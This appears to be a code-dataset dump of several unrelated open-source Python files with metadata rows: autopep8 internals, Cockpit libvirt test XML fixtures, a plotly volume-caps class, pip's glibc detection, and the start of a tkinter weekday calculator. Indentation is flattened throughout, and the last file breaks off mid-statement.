if not options:
options = parse_args([''])
if not isinstance(source, unicode):
source = source.decode(encoding or locale.getpreferredencoding())
sio = io.StringIO(source)
return fix_lines(sio.readlines(), options=options)
def fix_lines(source_lines, options, filename=''):
"""Return fixed source code."""
# Transform everything to line feed. Then change them back to original
# before returning fixed source code.
original_newline = find_newline(source_lines)
tmp_source = ''.join(normalize_line_endings(source_lines, '\n'))
# Keep a history to break out of cycles.
previous_hashes = set()
if options.line_range:
fixed_source = apply_local_fixes(tmp_source, options)
else:
# Apply global fixes only once (for efficiency).
fixed_source = apply_global_fixes(tmp_source, options)
passes = 0
long_line_ignore_cache = set()
while hash(fixed_source) not in previous_hashes:
if options.pep8_passes >= 0 and passes > options.pep8_passes:
break
passes += 1
previous_hashes.add(hash(fixed_source))
tmp_source = copy.copy(fixed_source)
fix = FixPEP8(
filename,
options,
contents=tmp_source,
long_line_ignore_cache=long_line_ignore_cache)
fixed_source = fix.fix()
sio = io.StringIO(fixed_source)
return ''.join(normalize_line_endings(sio.readlines(), original_newline))
def fix_file(filename, options=None, output=None):
if not options:
options = parse_args([filename])
original_source = readlines_from_file(filename)
fixed_source = original_source
if options.in_place or output:
encoding = detect_encoding(filename)
if output:
output = codecs.getwriter(encoding)(output.buffer
if hasattr(output, 'buffer')
else output)
output = LineEndingWrapper(output)
fixed_source = fix_lines(fixed_source, options, filename=filename)
if options.diff:
new = io.StringIO(fixed_source)
new = new.readlines()
diff = get_diff_text(original_source, new, filename)
if output:
output.write(diff)
output.flush()
else:
return diff
elif options.in_place:
fp = open_with_encoding(filename, encoding=encoding,
mode='w')
fp.write(fixed_source)
fp.close()
else:
if output:
output.write(fixed_source)
output.flush()
else:
return fixed_source
def global_fixes():
"""Yield multiple (code, function) tuples."""
for function in globals().values():
if inspect.isfunction(function):
arguments = inspect.getargspec(function)[0]
if arguments[:1] != ['source']:
continue
code = extract_code_from_function(function)
if code:
yield (code, function)
def apply_global_fixes(source, options, where='global'):
"""Run global fixes on source code.
These are fixes that only need be done once (unlike those in
FixPEP8, which are dependent on pep8).
"""
if code_match('E101', select=options.select, ignore=options.ignore):
source = reindent(source,
indent_size=options.indent_size)
for (code, function) in global_fixes():
if code_match(code, select=options.select, ignore=options.ignore):
if options.verbose:
print('---> Applying {0} fix for {1}'.format(where,
code.upper()),
file=sys.stderr)
source = function(source,
aggressive=options.aggressive)
source = fix_2to3(source,
aggressive=options.aggressive,
select=options.select,
ignore=options.ignore)
return source
def apply_local_fixes(source, options):
"""Ananologus to apply_global_fixes, but runs only those which makes sense
for the given line_range.
Do as much as we can without breaking code.
"""
def find_ge(a, x):
"""Find leftmost item greater than or equal to x."""
i = bisect.bisect_left(a, x)
if i != len(a):
return i, a[i]
return len(a) - 1, a[-1]
def find_le(a, x):
"""Find rightmost value less than or equal to x."""
i = bisect.bisect_right(a, x)
if i:
return i - 1, a[i - 1]
return 0, a[0]
def local_fix(source, start_log, end_log,
start_lines, end_lines, indents, last_line):
"""apply_global_fixes to the source between start_log and end_log.
The subsource must be the correct syntax of a complete python program
(but all lines may share an indentation). The subsource's shared indent
is removed, fixes are applied and the indent prepended back. Taking
care to not reindent strings.
last_line is the strict cut off (options.line_range[1]), so that
lines after last_line are not modified.
"""
if end_log < start_log:
return source
ind = indents[start_log]
indent = _get_indentation(source[start_lines[start_log]])
sl = slice(start_lines[start_log], end_lines[end_log] + 1)
subsource = source[sl]
# Remove indent from subsource.
if ind:
for line_no in start_lines[start_log:end_log + 1]:
pos = line_no - start_lines[start_log]
subsource[pos] = subsource[pos][ind:]
# Fix indentation of subsource.
fixed_subsource = apply_global_fixes(''.join(subsource),
options,
where='local')
fixed_subsource = fixed_subsource.splitlines(True)
# Add back indent for non multi-line strings lines.
msl = multiline_string_lines(''.join(fixed_subsource),
include_docstrings=False)
for i, line in enumerate(fixed_subsource):
if not i + 1 in msl:
fixed_subsource[i] = indent + line if line != '\n' else line
# We make a special case to look at the final line, if it's a multiline
# *and* the cut off is somewhere inside it, we take the fixed
# subset up until last_line, this assumes that the number of lines
# does not change in this multiline line.
changed_lines = len(fixed_subsource)
if (start_lines[end_log] != end_lines[end_log]
and end_lines[end_log] > last_line):
after_end = end_lines[end_log] - last_line
fixed_subsource = (fixed_subsource[:-after_end] +
source[sl][-after_end:])
changed_lines -= after_end
options.line_range[1] = (options.line_range[0] +
changed_lines - 1)
return (source[:start_lines[start_log]] +
fixed_subsource +
source[end_lines[end_log] + 1:])
def is_continued_stmt(line,
continued_stmts=frozenset(['else', 'elif',
'finally', 'except'])):
return re.split('[ :]', line.strip(), 1)[0] in continued_stmts
assert options.line_range
start, end = options.line_range
start -= 1
end -= 1
last_line = end # We shouldn't modify lines after this cut-off.
try:
logical = _find_logical(source)
except (SyntaxError, tokenize.TokenError):
return ''.join(source)
if not logical[0]:
# Just blank lines, this should imply that it will become '\n' ?
return apply_global_fixes(source, options)
start_lines, indents = zip(*logical[0])
end_lines, _ = zip(*logical[1])
source = source.splitlines(True)
start_log, start = find_ge(start_lines, start)
end_log, end = find_le(start_lines, end)
# Look behind one line, if it's indented less than current indent
# then we can move to this previous line knowing that its
# indentation level will not be changed.
if (start_log > 0
and indents[start_log - 1] < indents[start_log]
and not is_continued_stmt(source[start_log - 1])):
start_log -= 1
start = start_lines[start_log]
while start < end:
if is_continued_stmt(source[start]):
start_log += 1
start = start_lines[start_log]
continue
ind = indents[start_log]
for t in itertools.takewhile(lambda t: t[1][1] >= ind,
enumerate(logical[0][start_log:])):
n_log, n = start_log + t[0], t[1][0]
# start shares indent up to n.
if n <= end:
source = local_fix(source, start_log, n_log,
start_lines, end_lines,
indents, last_line)
start_log = n_log if n == end else n_log + 1
start = start_lines[start_log]
continue
else:
# Look at the line after end and see if allows us to reindent.
after_end_log, after_end = find_ge(start_lines, end + 1)
if indents[after_end_log] > indents[start_log]:
start_log, start = find_ge(start_lines, start + 1)
continue
if (indents[after_end_log] == indents[start_log]
and is_continued_stmt(source[after_end])):
# find n, the beginning of the last continued statement
# Apply fix to previous block if there is one.
only_block = True
for n, n_ind in logical[0][start_log:end_log + 1][::-1]:
if n_ind == ind and not is_continued_stmt(source[n]):
n_log = start_lines.index(n)
source = local_fix(source, start_log, n_log - 1,
start_lines, end_lines,
indents, last_line)
start_log = n_log + 1
start = start_lines[start_log]
only_block = False
break
if only_block:
end_log, end = find_le(start_lines, end - 1)
continue
source = local_fix(source, start_log, end_log,
start_lines, end_lines,
indents, last_line)
break
return ''.join(source)
def extract_code_from_function(function):
"""Return code handled by function."""
if not function.__name__.startswith('fix_'):
return None
code = re.sub('^fix_', '', function.__name__)
if not code:
return None
try:
int(code[1:])
except ValueError:
return None
return code
def create_parser():
"""Return command-line parser."""
# Do import locally to be friendly to those who use autopep8 as a library
# and are supporting Python 2.6.
import argparse
parser = argparse.ArgumentParser(description=docstring_summary(__doc__),
prog='autopep8')
parser.add_argument('--version', action='version',
version='%(prog)s ' + __version__)
parser.add_argument('-v', '--verbose', action='count', dest='verbose',
default=0,
help='print verbose messages; '
'multiple -v result in more verbose messages')
parser.add_argument('-d', '--diff', action='store_true', dest='diff',
help='print the diff for the fixed source')
parser.add_argument('-i', '--in-place', action='store_true',
help='make changes to files in place')
parser.add_argument('-r', '--recursive', action='store_true',
help='run recursively over directories; '
'must be used with --in-place or --diff')
parser.add_argument('-j', '--jobs', type=int, metavar='n', default=1,
help='number of parallel jobs; '
'match CPU count if value is less than 1')
parser.add_argument('-p', '--pep8-passes', metavar='n',
default=-1, type=int,
help='maximum number of additional pep8 passes '
'(default: infinite)')
parser.add_argument('-a', '--aggressive', action='count', default=0,
help='enable non-whitespace changes; '
'multiple -a result in more aggressive changes')
parser.add_argument('--experimental', action='store_true',
help='enable experimental fixes')
parser.add_argument('--exclude', metavar='globs',
help='exclude file/directory names that match these '
'comma-separated globs')
parser.add_argument('--list-fixes', action='store_true',
help='list codes for fixes; '
'used by --ignore and --select')
parser.add_argument('--ignore', metavar='errors', default='',
help='do not fix these errors/warnings '
'(default: {0})'.format(DEFAULT_IGNORE))
parser.add_argument('--select', metavar='errors', default='',
help='fix only these errors/warnings (e.g. E4,W)')
parser.add_argument('--max-line-length', metavar='n', default=79, type=int,
help='set maximum allowed line length '
'(default: %(default)s)')
parser.add_argument('--range', metavar='line', dest='line_range',
default=None, type=int, nargs=2,
help='only fix errors found within this inclusive '
'range of line numbers (e.g. 1 99); '
'line numbers are indexed at 1')
parser.add_argument('--indent-size', default=DEFAULT_INDENT_SIZE,
type=int, metavar='n',
help='number of spaces per indent level '
'(default %(default)s)')
parser.add_argument('files', nargs='*',
help="files to format or '-' for standard in")
return parser
def parse_args(arguments):
"""Parse command-line options."""
parser = create_parser()
args = parser.parse_args(arguments)
if not args.files and not args.list_fixes:
parser.error('incorrect number of arguments')
args.files = [decode_filename(name) for name in args.files]
if '-' in args.files:
if len(args.files) > 1:
parser.error('cannot mix stdin and regular files')
if args.diff:
parser.error('--diff cannot be used with standard input')
if args.in_place:
parser.error('--in-place cannot be used with standard input')
if args.recursive:
parser.error('--recursive cannot be used with standard input')
if len(args.files) > 1 and not (args.in_place or args.diff):
parser.error('autopep8 only takes one filename as argument '
'unless the "--in-place" or "--diff" args are '
'used')
if args.recursive and not (args.in_place or args.diff):
parser.error('--recursive must be used with --in-place or --diff')
if args.exclude and not args.recursive:
parser.error('--exclude is only relevant when used with --recursive')
if args.in_place and args.diff:
parser.error('--in-place and --diff are mutually exclusive')
if args.max_line_length <= 0:
parser.error('--max-line-length must be greater than 0')
if args.select:
args.select = args.select.split(',')
if args.ignore:
args.ignore = args.ignore.split(',')
elif not args.select:
if args.aggressive:
# Enable everything by default if aggressive.
args.select = ['E', 'W']
else:
args.ignore = DEFAULT_IGNORE.split(',')
if args.exclude:
args.exclude = args.exclude.split(',')
else:
args.exclude = []
if args.jobs < 1:
# Do not import multiprocessing globally in case it is not supported
# on the platform.
import multiprocessing
args.jobs = multiprocessing.cpu_count()
if args.jobs > 1 and not args.in_place:
parser.error('parallel jobs requires --in-place')
if args.line_range:
if args.line_range[0] <= 0:
parser.error('--range must be positive numbers')
if args.line_range[0] > args.line_range[1]:
parser.error('First value of --range should be less than or equal '
'to the second')
return args
def decode_filename(filename):
"""Return Unicode filename."""
if isinstance(filename, unicode):
return filename
else:
return filename.decode(sys.getfilesystemencoding())
def supported_fixes():
"""Yield pep8 error codes that autopep8 fixes.
Each item we yield is a tuple of the code followed by its
description.
"""
yield ('E101', docstring_summary(reindent.__doc__))
instance = FixPEP8(filename=None, options=None, contents='')
for attribute in dir(instance):
code = re.match('fix_([ew][0-9][0-9][0-9])', attribute)
if code:
yield (
code.group(1).upper(),
re.sub(r'\s+', ' ',
docstring_summary(getattr(instance, attribute).__doc__))
)
for (code, function) in sorted(global_fixes()):
yield (code.upper() + (4 - len(code)) * ' ',
re.sub(r'\s+', ' ', docstring_summary(function.__doc__)))
for code in sorted(CODE_TO_2TO3):
yield (code.upper() + (4 - len(code)) * ' ',
re.sub(r'\s+', ' ', docstring_summary(fix_2to3.__doc__)))
def docstring_summary(docstring):
"""Return summary of docstring."""
return docstring.split('\n')[0]
def line_shortening_rank(candidate, indent_word, max_line_length,
experimental=False):
"""Return rank of candidate.
This is for sorting candidates.
"""
if not candidate.strip():
return 0
rank = 0
lines = candidate.split('\n')
offset = 0
if (
not lines[0].lstrip().startswith('#') and
lines[0].rstrip()[-1] not in '([{'
):
for (opening, closing) in ('()', '[]', '{}'):
# Don't penalize empty containers that aren't split up. Things like
# this "foo(\n )" aren't particularly good.
opening_loc = lines[0].find(opening)
closing_loc = lines[0].find(closing)
if opening_loc >= 0:
if closing_loc < 0 or closing_loc != opening_loc + 1:
offset = max(offset, 1 + opening_loc)
current_longest = max(offset + len(x.strip()) for x in lines)
rank += 4 * max(0, current_longest - max_line_length)
rank += len(lines)
# Too much variation in line length is ugly.
rank += 2 * standard_deviation(len(line) for line in lines)
bad_staring_symbol = {
'(': ')',
'[': ']',
'{': '}'}.get(lines[0][-1])
if len(lines) > 1:
if (
bad_staring_symbol and
lines[1].lstrip().startswith(bad_staring_symbol)
):
rank += 20
for lineno, current_line in enumerate(lines):
current_line = current_line.strip()
if current_line.startswith('#'):
continue
for bad_start in ['.', '%', '+', '-', '/']:
if current_line.startswith(bad_start):
rank += 100
# Do not tolerate operators on their own line.
if current_line == bad_start:
rank += 1000
if current_line.endswith(('(', '[', '{', '.')):
# Avoid lonely opening. They result in longer lines.
if len(current_line) <= len(indent_word):
rank += 100
# Avoid the ugliness of ", (\n".
if (
current_line.endswith('(') and
current_line[:-1].rstrip().endswith(',')
):
rank += 100
# Also avoid the ugliness of "foo.\nbar"
if current_line.endswith('.'):
rank += 100
if has_arithmetic_operator(current_line):
rank += 100
if current_line.endswith(('%', '(', '[', '{')):
rank -= 20
# Try to break list comprehensions at the "for".
if current_line.startswith('for '):
rank -= 50
if current_line.endswith('\\'):
# If a line ends in \-newline, it may be part of a
# multiline string. In that case, we would like to know
# how long that line is without the \-newline. If it's
# longer than the maximum, or has comments, then we assume
# that the \-newline is an okay candidate and only
# penalize it a bit.
total_len = len(current_line)
lineno += 1
while lineno < len(lines):
total_len += len(lines[lineno])
if lines[lineno].lstrip().startswith('#'):
total_len = max_line_length
break
if not lines[lineno].endswith('\\'):
break
lineno += 1
if total_len < max_line_length:
rank += 10
else:
rank += 100 if experimental else 1
# Prefer breaking at commas rather than colon.
if ',' in current_line and current_line.endswith(':'):
rank += 10
rank += 10 * count_unbalanced_brackets(current_line)
return max(0, rank)
def standard_deviation(numbers):
"""Return standard devation."""
numbers = list(numbers)
if not numbers:
return 0
mean = sum(numbers) / len(numbers)
return (sum((n - mean) ** 2 for n in numbers) /
len(numbers)) ** .5
def has_arithmetic_operator(line):
"""Return True if line contains any arithmetic operators."""
for operator in pep8.ARITHMETIC_OP:
if operator in line:
return True
return False
def count_unbalanced_brackets(line):
"""Return number of unmatched open/close brackets."""
count = 0
for opening, closing in ['()', '[]', '{}']:
count += abs(line.count(opening) - line.count(closing))
return count
def split_at_offsets(line, offsets):
"""Split line at offsets.
Return list of strings.
"""
result = []
previous_offset = 0
current_offset = 0
for current_offset in sorted(offsets):
if current_offset < len(line) and previous_offset != current_offset:
result.append(line[previous_offset:current_offset].strip())
previous_offset = current_offset
result.append(line[current_offset:])
return result
class LineEndingWrapper(object):
r"""Replace line endings to work with sys.stdout.
It seems that sys.stdout expects only '\n' as the line ending, no matter
the platform. Otherwise, we get repeated line endings.
"""
def __init__(self, output):
self.__output = output
def write(self, s):
self.__output.write(s.replace('\r\n', '\n').replace('\r', '\n'))
def flush(self):
self.__output.flush()
def match_file(filename, exclude):
"""Return True if file is okay for modifying/recursing."""
base_name = os.path.basename(filename)
if base_name.startswith('.'):
return False
for pattern in exclude:
if fnmatch.fnmatch(base_name, pattern):
return False
if not os.path.isdir(filename) and not is_python_file(filename):
return False
return True
def find_files(filenames, recursive, exclude):
"""Yield filenames."""
while filenames:
name = filenames.pop(0)
if recursive and os.path.isdir(name):
for root, directories, children in os.walk(name):
filenames += [os.path.join(root, f) for f in children
if match_file(os.path.join(root, f),
exclude)]
directories[:] = [d for d in directories
if match_file(os.path.join(root, d),
exclude)]
else:
yield name
def _fix_file(parameters):
"""Helper function for optionally running fix_file() in parallel."""
if parameters[1].verbose:
print('[file:{0}]'.format(parameters[0]), file=sys.stderr)
try:
fix_file(*parameters)
except IOError as error:
print(unicode(error), file=sys.stderr)
def fix_multiple_files(filenames, options, output=None):
"""Fix list of files.
Optionally fix files recursively.
"""
filenames = find_files(filenames, options.recursive, options.exclude)
if options.jobs > 1:
import multiprocessing
pool = multiprocessing.Pool(options.jobs)
pool.map(_fix_file,
[(name, options) for name in filenames])
else:
for name in filenames:
_fix_file((name, options, output))
def is_python_file(filename):
"""Return True if filename is Python file."""
if filename.endswith('.py'):
return True
try:
with open_with_encoding(filename) as f:
first_line = f.readlines(1)[0]
except (IOError, IndexError):
return False
if not PYTHON_SHEBANG_REGEX.match(first_line):
return False
return True
def is_probably_part_of_multiline(line):
"""Return True if line is likely part of a multiline string.
When multiline strings are involved, pep8 reports the error as being
at the start of the multiline string, which doesn't work for us.
"""
return (
'"""' in line or
"'''" in line or
line.rstrip().endswith('\\')
)
def main():
"""Tool main."""
try:
# Exit on broken pipe.
signal.signal(signal.SIGPIPE, signal.SIG_DFL)
except AttributeError: # pragma: no cover
# SIGPIPE is not available on Windows.
pass
try:
args = parse_args(sys.argv[1:])
if args.list_fixes:
for code, description in sorted(supported_fixes()):
print('{code} - {description}'.format(
code=code, description=description))
return 0
if args.files == ['-']:
assert not args.in_place
# LineEndingWrapper is unnecessary here due to the symmetry between
# standard in and standard out.
sys.stdout.write(
fix_code(
sys.stdin.read(),
args,
encoding=sys.stdin.encoding))
else:
if args.in_place or args.diff:
args.files = list(set(args.files))
else:
assert len(args.files) == 1
assert not args.recursive
fix_multiple_files(args.files, args, sys.stdout)
except KeyboardInterrupt:
return 1 # pragma: no cover
class CachedTokenizer(object):
"""A one-element cache around tokenize.generate_tokens().
Original code written by Ned Batchelder, in coverage.py.
"""
def __init__(self):
self.last_text = None
self.last_tokens = None
def generate_tokens(self, text):
"""A stand-in for tokenize.generate_tokens()."""
if text != self.last_text:
string_io = io.StringIO(text)
self.last_tokens = list(
tokenize.generate_tokens(string_io.readline)
)
self.last_text = text
return self.last_tokens
_cached_tokenizer = CachedTokenizer()
generate_tokens = _cached_tokenizer.generate_tokens
if __name__ == '__main__':
sys.exit(main())
| apache-2.0 | -5,528,320,661,522,171,000 | 32.020613 | 79 | 0.537245 | false |
deryni/cockpit | test/verify/machinesxmls.py | 1 | 4667 | # This file is part of Cockpit.
#
# Copyright (C) 2020 Red Hat, Inc.
#
# Cockpit is free software; you can redistribute it and/or modify it
# under the terms of the GNU Lesser General Public License as published by
# the Free Software Foundation; either version 2.1 of the License, or
# (at your option) any later version.
#
# Cockpit is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with Cockpit; If not, see <http://www.gnu.org/licenses/>.
TEST_NETWORK_XML = """
<network>
<name>test_network</name>
<forward mode='nat'/>
<bridge name='virbr1' stp='on' delay='0'/>
<mac address='52:54:00:bc:93:8e'/>
<ip address='192.168.123.1' netmask='255.255.255.0'>
<dhcp>
<range start='192.168.123.2' end='192.168.123.254'/>
</dhcp>
</ip>
</network>
"""
TEST_NETWORK2_XML = """
<network>
<name>test_network2</name>
<bridge name='virbr1' stp='on' delay='0'/>
<mac address='52:54:00:79:86:29'/>
<domain name='test'/>
<bandwidth>
<inbound average='1000' peak='9000' burst='5000'/>
<outbound average='2000' peak='3000' burst='4000'/>
</bandwidth>
<ip family='ipv6' address='fd00:e81d:a6d7:55::1' prefix='64'>
<dhcp>
<range start='fd00:e81d:a6d7:55::100' end='fd00:e81d:a6d7:55::1ff'/>
<host name='simon' ip='2001:db8:ca2:2:3::1'/>
<host id='0:1:0:1:18:aa:62:fe:0:16:3e:44:55:66' ip='2001:db8:ca2:2:3::2'/>
</dhcp>
</ip>
<ip address='192.168.100.1' netmask='255.255.255.0'>
<dhcp>
<range start='192.168.100.128' end='192.168.100.170'/>
<host mac='00:16:3E:5D:C7:9E' name='paul' ip='192.168.122.254'/>
</dhcp>
</ip>
</network>
"""
TEST_NETWORK3_XML = """
<network>
<name>test_network3</name>
<forward mode='bridge'/>
<bridge name='br0'/>
</network>
"""
TEST_NETWORK4_XML = """
<network>
<name>test_network4</name>
</network>
"""
SPICE_XML = """
<video>
<model type='vga' heads='1' primary='yes'/>
<alias name='video0'/>
</video>
<graphics type='spice' port='5900' autoport='yes' listen='127.0.0.1'>
<listen type='address' address='127.0.0.1'/>
<image compression='off'/>
</graphics>
"""
VNC_XML = """
<video>
<model type='vga' heads='1' primary='yes'/>
<alias name='video0'/>
</video>
<graphics type='vnc' port='5900' autoport='yes' listen='127.0.0.1'>
<listen type='address' address='127.0.0.1'/>
</graphics>
"""
CONSOLE_XML = """
<console type='file'>
<target type='serial' port='0'/>
<source path='{log}'/>
</console>
"""
PTYCONSOLE_XML = """
<serial type='pty'>
<source path='/dev/pts/3'/>
<target port='0'/>
<alias name='serial0'/>
</serial>
<console type='pty' tty='/dev/pts/3'>
<source path='/dev/pts/3'/>
<target type='serial' port='0'/>
<alias name='serial0'/>
</console>
"""
DOMAIN_XML = """
<domain type='qemu'>
<name>{name}</name>
<vcpu>1</vcpu>
<os>
<type arch='x86_64'>hvm</type>
<boot dev='hd'/>
<boot dev='network'/>
</os>
<memory unit='MiB'>256</memory>
<currentMemory unit='MiB'>256</currentMemory>
<features>
<acpi/>
</features>
<devices>
<disk type='file'>
<driver name='qemu' type='qcow2'/>
<source file='{image}'/>
<target dev='vda' bus='virtio'/>
<serial>SECOND</serial>
</disk>
<controller type='scsi' model='virtio-scsi' index='0' id='hot'/>
<interface type='network'>
<source network='default' bridge='virbr0'/>
<target dev='vnet0'/>
</interface>
<channel type='unix'>
<target type='virtio' name='org.qemu.guest_agent.0'/>
<address type='virtio-serial' controller='0' bus='0' port='1'/>
</channel>
{console}
{graphics}
</devices>
</domain>
"""
POOL_XML = """
<pool type='dir'>
<name>images</name>
<target>
<path>{path}</path>
</target>
</pool>
"""
NETWORK_XML_PXE = """<network>
<name>pxe-nat</name>
<forward mode='nat'>
<nat>
<port start='1024' end='65535'/>
</nat>
</forward>
<bridge name='virbr0' stp='on' delay='0'/>
<mac address='52:54:00:53:7d:8e'/>
<ip address='192.168.122.1' netmask='255.255.255.0'>
<tftp root='/var/lib/libvirt/pxe-config'/>
<dhcp>
<range start='192.168.122.2' end='192.168.122.254'/>
<bootp file='pxe.cfg'/>
</dhcp>
</ip>
</network>"""
PXE_SERVER_CFG = """#!ipxe
echo Rebooting in 60 seconds
sleep 60
reboot"""
| lgpl-2.1 | 1,977,698,032,751,698,700 | 24.78453 | 80 | 0.596957 | false |
plotly/plotly.py | packages/python/plotly/plotly/graph_objs/volume/_caps.py | 2 | 6821 | from plotly.basedatatypes import BaseTraceHierarchyType as _BaseTraceHierarchyType
import copy as _copy
class Caps(_BaseTraceHierarchyType):
# class properties
# --------------------
_parent_path_str = "volume"
_path_str = "volume.caps"
_valid_props = {"x", "y", "z"}
# x
# -
@property
def x(self):
"""
The 'x' property is an instance of X
that may be specified as:
- An instance of :class:`plotly.graph_objs.volume.caps.X`
- A dict of string/value properties that will be passed
to the X constructor
Supported dict properties:
fill
Sets the fill ratio of the `caps`. The default
fill value of the `caps` is 1 meaning that they
are entirely shaded. On the other hand Applying
a `fill` ratio less than one would allow the
creation of openings parallel to the edges.
show
Sets the fill ratio of the `slices`. The
default fill value of the x `slices` is 1
meaning that they are entirely shaded. On the
other hand Applying a `fill` ratio less than
one would allow the creation of openings
parallel to the edges.
Returns
-------
plotly.graph_objs.volume.caps.X
"""
return self["x"]
@x.setter
def x(self, val):
self["x"] = val
# y
# -
@property
def y(self):
"""
The 'y' property is an instance of Y
that may be specified as:
- An instance of :class:`plotly.graph_objs.volume.caps.Y`
- A dict of string/value properties that will be passed
to the Y constructor
Supported dict properties:
fill
Sets the fill ratio of the `caps`. The default
fill value of the `caps` is 1 meaning that they
are entirely shaded. On the other hand Applying
a `fill` ratio less than one would allow the
creation of openings parallel to the edges.
show
Sets the fill ratio of the `slices`. The
default fill value of the y `slices` is 1
meaning that they are entirely shaded. On the
other hand Applying a `fill` ratio less than
one would allow the creation of openings
parallel to the edges.
Returns
-------
plotly.graph_objs.volume.caps.Y
"""
return self["y"]
@y.setter
def y(self, val):
self["y"] = val
# z
# -
@property
def z(self):
"""
The 'z' property is an instance of Z
that may be specified as:
- An instance of :class:`plotly.graph_objs.volume.caps.Z`
- A dict of string/value properties that will be passed
to the Z constructor
Supported dict properties:
fill
Sets the fill ratio of the `caps`. The default
fill value of the `caps` is 1 meaning that they
are entirely shaded. On the other hand Applying
a `fill` ratio less than one would allow the
creation of openings parallel to the edges.
show
Sets the fill ratio of the `slices`. The
default fill value of the z `slices` is 1
meaning that they are entirely shaded. On the
other hand Applying a `fill` ratio less than
one would allow the creation of openings
parallel to the edges.
Returns
-------
plotly.graph_objs.volume.caps.Z
"""
return self["z"]
@z.setter
def z(self, val):
self["z"] = val
# Self properties description
# ---------------------------
@property
def _prop_descriptions(self):
return """\
x
:class:`plotly.graph_objects.volume.caps.X` instance or
dict with compatible properties
y
:class:`plotly.graph_objects.volume.caps.Y` instance or
dict with compatible properties
z
:class:`plotly.graph_objects.volume.caps.Z` instance or
dict with compatible properties
"""
def __init__(self, arg=None, x=None, y=None, z=None, **kwargs):
"""
Construct a new Caps object
Parameters
----------
arg
dict of properties compatible with this constructor or
an instance of :class:`plotly.graph_objs.volume.Caps`
x
:class:`plotly.graph_objects.volume.caps.X` instance or
dict with compatible properties
y
:class:`plotly.graph_objects.volume.caps.Y` instance or
dict with compatible properties
z
:class:`plotly.graph_objects.volume.caps.Z` instance or
dict with compatible properties
Returns
-------
Caps
"""
super(Caps, self).__init__("caps")
if "_parent" in kwargs:
self._parent = kwargs["_parent"]
return
# Validate arg
# ------------
if arg is None:
arg = {}
elif isinstance(arg, self.__class__):
arg = arg.to_plotly_json()
elif isinstance(arg, dict):
arg = _copy.copy(arg)
else:
raise ValueError(
"""\
The first argument to the plotly.graph_objs.volume.Caps
constructor must be a dict or
an instance of :class:`plotly.graph_objs.volume.Caps`"""
)
# Handle skip_invalid
# -------------------
self._skip_invalid = kwargs.pop("skip_invalid", False)
self._validate = kwargs.pop("_validate", True)
# Populate data dict with properties
# ----------------------------------
_v = arg.pop("x", None)
_v = x if x is not None else _v
if _v is not None:
self["x"] = _v
_v = arg.pop("y", None)
_v = y if y is not None else _v
if _v is not None:
self["y"] = _v
_v = arg.pop("z", None)
_v = z if z is not None else _v
if _v is not None:
self["z"] = _v
# Process unknown kwargs
# ----------------------
self._process_kwargs(**dict(arg, **kwargs))
# Reset skip_invalid
# ------------------
self._skip_invalid = False
| mit | 863,666,565,619,956,100 | 31.327014 | 82 | 0.500806 | false |
etherkit/OpenBeacon2 | macos/venv/lib/python3.8/site-packages/pip/_internal/utils/glibc.py | 24 | 3297 | # The following comment should be removed at some point in the future.
# mypy: strict-optional=False
from __future__ import absolute_import
import os
import sys
from pip._internal.utils.typing import MYPY_CHECK_RUNNING
if MYPY_CHECK_RUNNING:
from typing import Optional, Tuple
def glibc_version_string():
# type: () -> Optional[str]
"Returns glibc version string, or None if not using glibc."
return glibc_version_string_confstr() or glibc_version_string_ctypes()
def glibc_version_string_confstr():
# type: () -> Optional[str]
"Primary implementation of glibc_version_string using os.confstr."
# os.confstr is quite a bit faster than ctypes.DLL. It's also less likely
# to be broken or missing. This strategy is used in the standard library
# platform module:
# https://github.com/python/cpython/blob/fcf1d003bf4f0100c9d0921ff3d70e1127ca1b71/Lib/platform.py#L175-L183
if sys.platform == "win32":
return None
try:
# os.confstr("CS_GNU_LIBC_VERSION") returns a string like "glibc 2.17":
_, version = os.confstr("CS_GNU_LIBC_VERSION").split()
except (AttributeError, OSError, ValueError):
# os.confstr() or CS_GNU_LIBC_VERSION not available (or a bad value)...
return None
return version
def glibc_version_string_ctypes():
# type: () -> Optional[str]
"Fallback implementation of glibc_version_string using ctypes."
try:
import ctypes
except ImportError:
return None
# ctypes.CDLL(None) internally calls dlopen(NULL), and as the dlopen
# manpage says, "If filename is NULL, then the returned handle is for the
# main program". This way we can let the linker do the work to figure out
# which libc our process is actually using.
process_namespace = ctypes.CDLL(None)
try:
gnu_get_libc_version = process_namespace.gnu_get_libc_version
except AttributeError:
# Symbol doesn't exist -> therefore, we are not linked to
# glibc.
return None
# Call gnu_get_libc_version, which returns a string like "2.5"
gnu_get_libc_version.restype = ctypes.c_char_p
version_str = gnu_get_libc_version()
# py2 / py3 compatibility:
if not isinstance(version_str, str):
version_str = version_str.decode("ascii")
return version_str
# platform.libc_ver regularly returns completely nonsensical glibc
# versions. E.g. on my computer, platform says:
#
# ~$ python2.7 -c 'import platform; print(platform.libc_ver())'
# ('glibc', '2.7')
# ~$ python3.5 -c 'import platform; print(platform.libc_ver())'
# ('glibc', '2.9')
#
# But the truth is:
#
# ~$ ldd --version
# ldd (Debian GLIBC 2.22-11) 2.22
#
# This is unfortunate, because it means that the linehaul data on libc
# versions that was generated by pip 8.1.2 and earlier is useless and
# misleading. Solution: instead of using platform, use our code that actually
# works.
def libc_ver():
# type: () -> Tuple[str, str]
"""Try to determine the glibc version
Returns a tuple of strings (lib, version) which default to empty strings
in case the lookup fails.
"""
glibc_version = glibc_version_string()
if glibc_version is None:
return ("", "")
else:
return ("glibc", glibc_version)
| gpl-3.0 | 2,129,941,661,303,765,500 | 32.642857 | 111 | 0.676979 | false |
xpowerx5005/Weekday-Calculator | Weekday Calculator.py | 1 | 11835 | #Input in the entry boxes of 'Year', 'Month' and 'Day'
#Month must be written as a number between 1-12
#Press "Calculate" button to return weekday of the given date
from time import*
from tkinter import*
class Calculator:
#GUI LAYOUT
def __init__(self, master):
self.master = master
self.months = ['January', 'january', 'February',
'february', 'March', 'march',
'April', 'april', 'May', 'may',
'June', 'june', 'July','july',
'August', 'august', 'September',
'september','October', 'october',
'November', 'november',
'December', 'december']
master.title('Weekday Calculator')
master.geometry('410x380')
master.resizable(width = False, height = False)
#Title
self.Title = Label(root, text= "Weekday Calculator",
font = ('Avenir', 18, 'normal'))
self.Title.grid(column = 0, columnspan = 7,
padx = 5, pady = 5)
#Description
self.Description = Label(root,
text= 'This program determines the specific weekday'
' for given dates \n'
'| Year (yyyy) | Month (mm) | Day (dd) |',
